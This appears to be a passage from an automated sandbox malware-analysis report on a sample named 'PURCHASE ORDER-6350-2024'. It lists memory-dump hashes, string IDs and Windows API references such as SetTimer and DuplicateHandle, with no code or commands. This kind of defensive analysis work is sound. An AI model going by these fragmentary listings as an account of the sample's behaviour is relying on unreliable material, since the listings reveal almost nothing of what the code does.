                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8aq$8aq
                                                  • API String ID: 0-1589283582
                                                  • Opcode ID: 7fae6b2ee1373c0ff770c705372f0cf39485f0c8206b0d59fe518918ffe8a3a0
                                                  • Instruction ID: b32180ca7c00f0740bae826dc4d135907332b567274831851cf3443565003524
                                                  • Opcode Fuzzy Hash: 7fae6b2ee1373c0ff770c705372f0cf39485f0c8206b0d59fe518918ffe8a3a0
                                                  • Instruction Fuzzy Hash: 78210230B503189FE7949F699814AAB77EBABC9345B204439D60ADB386DE30CD058792

                                                  Control-flow Graph

                                                  • Function at 10eaeb8: basic blocks 10eaeb8-10eb148. Internal calls: 10ea240 (10eaed9), 10eb150 or 10eb160 (10eaeee), 10ea24c (10eaf80), 10ea25c (10eafc8), 10ea26c and 10ea27c (10eafee). API: GetModuleHandleW in the 10eb100 block.
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 010EB11E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 06ae7c398d138d27c13eaac7fc776d5c4a67c02042757d54900f8606a18bdb9f
                                                  • Instruction ID: ccc480e0b5ea41a4e53a3f7dbde09148d002e99e6382e7dc98074b42a2995744
                                                  • Opcode Fuzzy Hash: 06ae7c398d138d27c13eaac7fc776d5c4a67c02042757d54900f8606a18bdb9f
                                                  • Instruction Fuzzy Hash: 9E813570A00B458FDB65DF6AD44879ABBF1FF88300F00896DE49ADBA50D775E845CB90

                                                  Control-flow Graph

                                                  • Function at 6e1f990: basic blocks 6e1f990-6e1fec6; no API or internal calls.
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q
                                                  • API String ID: 0-1259897404
                                                  • Opcode ID: a8d1968082d24ce1d53eb2aa1bd3a82d420c238bfa2aecb6eb85ba2838d4c179
                                                  • Instruction ID: 64f6c3cb56d9a9bf9d127463e64c94a8a1ab100d7a6e26c701e5f040dfead626
                                                  • Opcode Fuzzy Hash: a8d1968082d24ce1d53eb2aa1bd3a82d420c238bfa2aecb6eb85ba2838d4c179
                                                  • Instruction Fuzzy Hash: B8E18030A00309DFDB45EFA9D550AAEBBF6FF88300F108469D805AB369CB359D46DB95

                                                  Control-flow Graph

                                                  • Function at 6dda290: basic blocks 6dda22e-6dda41e. SetTimer is called in the 6dda24d block.
                                                  APIs
                                                  • SetTimer.USER32(?,01106428,?,?,?,?,?,?,06DDA0B0,00000000,00000000,?), ref: 06DDA25D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2057685940.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6dd0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: Timer
                                                  • String ID:
                                                  • API String ID: 2870079774-0
                                                  • Opcode ID: b921c29ba07e56f4de4ed1ce85ec305097000be058c73190b4618c49b3a6db1b
                                                  • Instruction ID: 79d32211b651189c6af6ef0884e2789b2f1ad2205afc34a4ba0155e5a4462459
                                                  • Opcode Fuzzy Hash: b921c29ba07e56f4de4ed1ce85ec305097000be058c73190b4618c49b3a6db1b
                                                  • Instruction Fuzzy Hash: B1311631A05200CFDB21EF6AD444AA9BFF1EF86314F1980AAD444DB362C675E845CBA1

                                                  Control-flow Graph

                                                  • Function at 10e591c: basic blocks 10e591c-10e5a71. CreateActCtxA is called in the entry block 10e591c-10e59e9; the graph ends in a self-loop at 10e5a71.
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 010E59D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 08005f28129610484daa48c1beee2565119964a9c8bb51a0e5b42f3212720acf
                                                  • Instruction ID: e49f8c217628a1fe803ccf2117cb8a4ec60656a4fdad9b395787803a27aa08a7
                                                  • Opcode Fuzzy Hash: 08005f28129610484daa48c1beee2565119964a9c8bb51a0e5b42f3212720acf
                                                  • Instruction Fuzzy Hash: 8F4122B4C00319CEDB24CFAAC888BDEBBF1BF49304F24809AD059AB250DB751946CF51

                                                  Control-flow Graph

                                                  • Function at 10e5a94: a single basic block 10e5a94-10e5b24; no calls.
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cb1c4cc02b15feed7bfca8bf0b839ea2dbfcc9f9ed53bb13d5d184d3ce87f440
                                                  • Instruction ID: 6a8e47591a7c79ef791b2a4787fd1e71cfe5ae4f8b483dc56cb955114666d86d
                                                  • Opcode Fuzzy Hash: cb1c4cc02b15feed7bfca8bf0b839ea2dbfcc9f9ed53bb13d5d184d3ce87f440
                                                  • Instruction Fuzzy Hash: 0731DF79804349CFDB12CBA9C8587EDBFF0AF46318F14848AC495AB256C775580ACF51
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 010E59D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 60080554b34612627cabf96a95f239597762160d11a1fb83ac8af28a58e3be43
                                                  • Instruction ID: 425c513d5f278dee0c6905cf494009a53dc30643bedfcb60a5824944903a3ee5
                                                  • Opcode Fuzzy Hash: 60080554b34612627cabf96a95f239597762160d11a1fb83ac8af28a58e3be43
                                                  • Instruction Fuzzy Hash: F54103B4C00719CEDB24CFAAC848BDEBBF5BF49304F20805AD419AB250DB755946CF91
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010ED82F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: ab3a15b9c01173b66ffcfd7a60ef82441ef55e3a8161b1842e31319ac5ab3576
                                                  • Instruction ID: 24ac44da308da00193a58671af9ee95d3650ae28cc1961041269ff542f98f88a
                                                  • Opcode Fuzzy Hash: ab3a15b9c01173b66ffcfd7a60ef82441ef55e3a8161b1842e31319ac5ab3576
                                                  • Instruction Fuzzy Hash: BB21E3B59002089FDB10CFAAD584ADEBFF5FB48310F14805AE958A3350D379A944CFA1
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 010ED82F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 9bba9b9da3f5f418f0702292caa9c1b23762a300aa4a0a75f0633476ba35bdfa
                                                  • Instruction ID: 5a7224a81fbfcc352021cd028b82e55ffdb43a654f73db3c3a0fd9a0f9b78520
                                                  • Opcode Fuzzy Hash: 9bba9b9da3f5f418f0702292caa9c1b23762a300aa4a0a75f0633476ba35bdfa
                                                  • Instruction Fuzzy Hash: 5821E2B59002089FDB10CFAAD984ADEBFF9FB48310F14805AE918A3350D379A940CFA0
                                                  APIs
                                                  • SetTimer.USER32(?,01106428,?,?,?,?,?,?,06DDA0B0,00000000,00000000,?), ref: 06DDA25D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2057685940.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6dd0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: Timer
                                                  • String ID:
                                                  • API String ID: 2870079774-0
                                                  • Opcode ID: a672ceae1e34f72cb14c12c93e33e791fe7c07bd731ebd9fbe3877f65de31717
                                                  • Instruction ID: 262b6cd5c1a294bf0a128492a2375958d6328de33280bde6865159690c6ea913
                                                  • Opcode Fuzzy Hash: a672ceae1e34f72cb14c12c93e33e791fe7c07bd731ebd9fbe3877f65de31717
                                                  • Instruction Fuzzy Hash: 7C11E3B5800248DFCB20DF9AD845BDEBFF8FB48314F24841AD958A3200D379A584CFA1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2057650701.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6dc0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: ClickDoubleTime
                                                  • String ID:
                                                  • API String ID: 590776121-0
                                                  • Opcode ID: 550b279e3a0b5ca807cbea62bd9d338c1e64e0f55c124bd41b4f435092186adb
                                                  • Instruction ID: 1eb84a338be4c7f43e953669df4c813c7e92022e40ee0de75c28769da87659a2
                                                  • Opcode Fuzzy Hash: 550b279e3a0b5ca807cbea62bd9d338c1e64e0f55c124bd41b4f435092186adb
                                                  • Instruction Fuzzy Hash: E911C0759043498FCB22DFA9E4043DEBFF4EF45324F1480AAC499A7252C2395645CBA1
                                                  APIs
                                                  • SetTimer.USER32(?,01106428,?,?,?,?,?,?,06DDA0B0,00000000,00000000,?), ref: 06DDA25D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2057685940.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6dd0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: Timer
                                                  • String ID:
                                                  • API String ID: 2870079774-0
                                                  • Opcode ID: a2be36279fbc2e4ef3434268fa2796ff0b18b37c99df366822b61a3dc8ce000f
                                                  • Instruction ID: d1535c51e7a291d403c14babeb42b5cc68ece83c858d8416ca2795181de2969f
                                                  • Opcode Fuzzy Hash: a2be36279fbc2e4ef3434268fa2796ff0b18b37c99df366822b61a3dc8ce000f
                                                  • Instruction Fuzzy Hash: DE11E3B58003489FDB20DF9AD844BDEBFF8EB48314F14845AE518A7210C379A944CFA5
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 010EB11E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 8fe630084029f54d3919b4a10c12beeed5b2336b5bb645dca23cd0662d01aea2
                                                  • Instruction ID: 956b2c561dc512aac932e5c81c29421f49d211ac41aeca67aa3c14fdc908bdaf
                                                  • Opcode Fuzzy Hash: 8fe630084029f54d3919b4a10c12beeed5b2336b5bb645dca23cd0662d01aea2
                                                  • Instruction Fuzzy Hash: AE1110B5C002498FDB10DF9AD848ADEFBF5EF88324F10845AD568A7210C379A545CFA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (aq
                                                  • API String ID: 0-600464949
                                                  • Opcode ID: addf3fb717a84f623dd6bb252665c732708fe37d503a3bcc195949c6de43ea0f
                                                  • Instruction ID: ba3327559862e0f91703673a5fea34496104f84336f8ce5f8b3828f45effaf55
                                                  • Opcode Fuzzy Hash: addf3fb717a84f623dd6bb252665c732708fe37d503a3bcc195949c6de43ea0f
                                                  • Instruction Fuzzy Hash: EA418131B002059FDB55DF69C8646EEBAE6FF88210F108929E806DB390DF75DD45C751
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  • Opcode ID: 6e0621bbdd7cd014a3d6c5ffa6639a5ed3d2bd4bfc29d011e96b784ec8fb7cff
                                                  • Instruction ID: 92df7a93e70a414f7514375aeb678e901ef3b24e58e00dfdadd8c877f5a026fa
                                                  • Opcode Fuzzy Hash: 6e0621bbdd7cd014a3d6c5ffa6639a5ed3d2bd4bfc29d011e96b784ec8fb7cff
                                                  • Instruction Fuzzy Hash: F3210774D157488FEB58CFAAC9546EEBBF6AF99304F14D02AC419AF358DB700906CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8aq
                                                  • API String ID: 0-538729646
                                                  • Opcode ID: 11127c00202500c94269bec9b8bcc7b0c3fc54a82f0de250bfaa07a0de865ee2
                                                  • Instruction ID: 2753c9b0dfa4dcab0297f18e316a8c07a536112a1b9e5d4886cc9a0e0704debb
                                                  • Opcode Fuzzy Hash: 11127c00202500c94269bec9b8bcc7b0c3fc54a82f0de250bfaa07a0de865ee2
                                                  • Instruction Fuzzy Hash: 0A113375B04304CFEB859F789D04AAE77F7AB89205B14447AD60ADF382EA30CD088792
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  • Opcode ID: 619e97487e05a1d08604ea3a824e02f758aec96ffcab6fbf137589f679600138
                                                  • Instruction ID: 353d17f2fb8c71423f122085bd0ea5ef7edc86afadbc2441f58742e394c53e3b
                                                  • Opcode Fuzzy Hash: 619e97487e05a1d08604ea3a824e02f758aec96ffcab6fbf137589f679600138
                                                  • Instruction Fuzzy Hash: 4621D570D057488BEB48CFAAC9546EEBBF6AF99300F14D02AC419AF358DB700906CB80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ;
                                                  • API String ID: 0-1661535913
                                                  • Opcode ID: c78dc706c34efc8f7e3e4488269fe4e6b0eda3f1b7e326c4c1248e355dea6c96
                                                  • Instruction ID: 438989e6facb717917a02da3570fe31f53d5daa2c08bf4a80875e0c173da60fb
                                                  • Opcode Fuzzy Hash: c78dc706c34efc8f7e3e4488269fe4e6b0eda3f1b7e326c4c1248e355dea6c96
                                                  • Instruction Fuzzy Hash: 86215830948349CFDB90CF94C484AECBBB6AF0A311F206185D409EF605C7399989DB50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  • Opcode ID: b6d748f70039af6c8309b75d2f859db40e737e1603f1f082dbd1da5734fde62b
                                                  • Instruction ID: edbaee35a33c4b45bdddb4e1a469860cdce77a910d1dd3136f70a33ec0576b70
                                                  • Opcode Fuzzy Hash: b6d748f70039af6c8309b75d2f859db40e737e1603f1f082dbd1da5734fde62b
                                                  • Instruction Fuzzy Hash: 05117F75E00209CFDB09DFE8C5849EDBBB2FB88310F60812ADA19AB355C631A956CF50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Te]q
                                                  • API String ID: 0-52440209
                                                  • Opcode ID: c6ce6f738b5e0e488dffee461877c5bddb15980f63c18253c90ad5f86bb39d26
                                                  • Instruction ID: a80e23b7403a90c665f5eed674b300e1117026911e3fea7c9de507012f3cc6a4
                                                  • Opcode Fuzzy Hash: c6ce6f738b5e0e488dffee461877c5bddb15980f63c18253c90ad5f86bb39d26
                                                  • Instruction Fuzzy Hash: F4117275E01209DFCB05CFE8D4849ADFBB2FF48314F60416ADA09AB355C6326956CF50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9bfa470b0b51011cfcca071a1dc4812bfb22e2b6ca83a98fcd12327895f32656
                                                  • Instruction ID: 87a5949b1389003f867f5603685fc62855214b4bf8128447bf17826068b425ca
                                                  • Opcode Fuzzy Hash: 9bfa470b0b51011cfcca071a1dc4812bfb22e2b6ca83a98fcd12327895f32656
                                                  • Instruction Fuzzy Hash: 8CD1137090E394DFC7169FB8886019A7FB1EFC6300B1584D7D092CF2A3DA788909C7A6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3ec04f61b77bb961560dfdb22eca88aabac18c1b5e9f118ec05c3785081239f8
                                                  • Instruction ID: eafc5fa5d8f7897a939f733ac6752002e4cd3babb29424b4b6bc3fc77984393e
                                                  • Opcode Fuzzy Hash: 3ec04f61b77bb961560dfdb22eca88aabac18c1b5e9f118ec05c3785081239f8
                                                  • Instruction Fuzzy Hash: 57F1B771D1061ACBCF10DFA8C854AEDB7B5FF99300F1086A9E559B7214EB70AA85CF90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e62ab6a7e4e69bf9f8714fdd714c9fa09986b773c06ffd1b33183660ebcb3aa6
                                                  • Instruction ID: c7074ab7868f48ed4295ef34a5b26e6fd60a5e16bf0ed21c92a48a0011d35e3d
                                                  • Opcode Fuzzy Hash: e62ab6a7e4e69bf9f8714fdd714c9fa09986b773c06ffd1b33183660ebcb3aa6
                                                  • Instruction Fuzzy Hash: CCE1D871D1061A8FCF50DFA8C8545EDB7B5BF59300F1086AAE549B7214EB70AA89CF90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0fed334f125c3265baf8120b9fc656d06b6b407658b9df7c25a349936119a903
                                                  • Instruction ID: d8c6a96923a58c7616472168a83e6ce7375d7aa6b7f90ae7f35d801a245c88b7
                                                  • Opcode Fuzzy Hash: 0fed334f125c3265baf8120b9fc656d06b6b407658b9df7c25a349936119a903
                                                  • Instruction Fuzzy Hash: 14C16B31F10219CFDB54DF68C8546EDB7B2BF85304F1485A9D44ABB264EB30AE85CB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 71c21c0560bd2ffde863ed76cab513a4d2560eb4d75ab78795a608661bf5db3f
                                                  • Instruction ID: c05dc303b64b18848cf186e4f377fe7ce90bda055f7bf1f24e50306f78bb7437
                                                  • Opcode Fuzzy Hash: 71c21c0560bd2ffde863ed76cab513a4d2560eb4d75ab78795a608661bf5db3f
                                                  • Instruction Fuzzy Hash: 4F81D230E10219DFDB55EF68D8986ECBBB0FF44314F115069D146AB2A8EB30DAA5DB81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 60d93b5e76e189fe974246202b22da0822feccafff1edeec3b7d50576bb8c6b7
                                                  • Instruction ID: 84ec23f75367529fa0f82332ef97f60d5df0ac6b7cc5bd40dc2f933254069400
                                                  • Opcode Fuzzy Hash: 60d93b5e76e189fe974246202b22da0822feccafff1edeec3b7d50576bb8c6b7
                                                  • Instruction Fuzzy Hash: 41818B70A042598FDF54CFA8C590AEEBBF2BF44700F1094AAD4669B385D730DD42DB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e32b02209fd2d769b6476baa6bac1f375f96a18cffee3db350202d16a3dd2a1a
                                                  • Instruction ID: cc55ee4a30f87075acef4053b7adaea672f235679564a1f7278f5c04b67e152a
                                                  • Opcode Fuzzy Hash: e32b02209fd2d769b6476baa6bac1f375f96a18cffee3db350202d16a3dd2a1a
                                                  • Instruction Fuzzy Hash: 05616970E046198FDF44CFA9C590AEEBBF2BF48700F10999AD4669B245D734DD42DB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c21f9d692eaf05f2e64c022186c63428ea02035dfa3af01a9e225c6e9e36e0b
                                                  • Instruction ID: 17a43587b16f6e44b3f8ade1309c1d1941e5274cc80d86ca52a55dc5d0494d3a
                                                  • Opcode Fuzzy Hash: 6c21f9d692eaf05f2e64c022186c63428ea02035dfa3af01a9e225c6e9e36e0b
                                                  • Instruction Fuzzy Hash: C1519330E00205DFEF449FE9C9517EEBBB2BF44B00F108526E952AB385DB349942DB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b23dd99a2ee5cb25617c186d770d84c282d5dd150a505ab7b4ed95fbf989de47
                                                  • Instruction ID: 95e37b9799f4b1490857f8bb76de8efb299caa3411eb2584866edc330cbc878c
                                                  • Opcode Fuzzy Hash: b23dd99a2ee5cb25617c186d770d84c282d5dd150a505ab7b4ed95fbf989de47
                                                  • Instruction Fuzzy Hash: 1A51A131B002459FD705AF78D445AAEBBB2BF89300F14C4A9D995AF39ACF316949C781
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: beb4d0cafd12ec6b9bb161d3829150c27790733969068d719fb8aead5e2f6faa
                                                  • Instruction ID: 98bafca0e91af268e51370a5badc84c2fef3d23c326aaa97247ff075935be7f2
                                                  • Opcode Fuzzy Hash: beb4d0cafd12ec6b9bb161d3829150c27790733969068d719fb8aead5e2f6faa
                                                  • Instruction Fuzzy Hash: 8F519031B002059BD704AFB8D545AAEBBB3BF89300F14C4A9DD956F39ACF316949C781
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cfcac57783071d02df33583a4c92f7c28c00023bb4cbe07695f262815533fa86
                                                  • Instruction ID: a0f18695ea1fc854ec1278d3e193800817ad894979ef9089252c684d33c311aa
                                                  • Opcode Fuzzy Hash: cfcac57783071d02df33583a4c92f7c28c00023bb4cbe07695f262815533fa86
                                                  • Instruction Fuzzy Hash: 1251D131E04315AFEB50CFA8C844ABEBBF6FB48341F149066E501EF286D634C945DB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6e10000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c203db585ae25d1d6afc5774b950340497d189c3d1e7d4f0df73e01f094a4438
                                                  • Instruction ID: ab225e898acae3a477e67b8b32bd3bb598d075f3b241afaa8dae77c2ce030a4c
                                                  • Opcode Fuzzy Hash: c203db585ae25d1d6afc5774b950340497d189c3d1e7d4f0df73e01f094a4438
                                                  • Instruction Fuzzy Hash: 4C515C70E00208CFCB55DFA8D598A9EBBF2EF99315F148469E406AB361DB35DC82CB50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
